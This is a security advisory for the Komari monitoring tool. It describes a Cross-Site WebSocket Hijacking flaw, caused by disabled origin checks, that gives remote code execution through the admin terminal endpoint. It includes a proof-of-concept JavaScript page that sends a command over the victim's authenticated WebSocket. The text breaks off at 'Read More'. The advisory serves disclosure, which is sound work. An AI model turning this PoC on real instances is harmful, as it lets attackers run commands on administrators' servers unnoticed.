Summary WebSocket upgrader has disabled origin checking, enabling Cross-Site WebSocket Hijacking (CSWSH) attacks against authenticated users Details https://github.com/komari-monitor/komari/blob/bd5a6934e1b79a12cf1e6a9bba5372d0e04f3abc/api/terminal.go#L33-L35 Any third party website can send requests to the terminal websocket endpoint with browser's cookies, resulting in remote code execution PoC Login in to your komari instance Hosting the following HTML code on internet, replace <komari-addr> and <target-uuid> into yours Visit this HTML page, you can see your node is executing uptime without your actions “` const socket = new WebSocket("wss://<komari-addr>/api/admin/client/<target-uuid>/terminal"); socket.addEventListener("open", (event) => { const binaryBlob = new Blob(['uptimen'], { type: 'application/octet-stream' }); socket.send(binaryBlob); }); socket.addEventListener("message", (event) => { event.data.text().then(x => {document.querySelector("pre").append(x)}); }); “` Impact An administrator of a Komari instance will execute commands on their nodes unnoticed when visiting a malware…Read More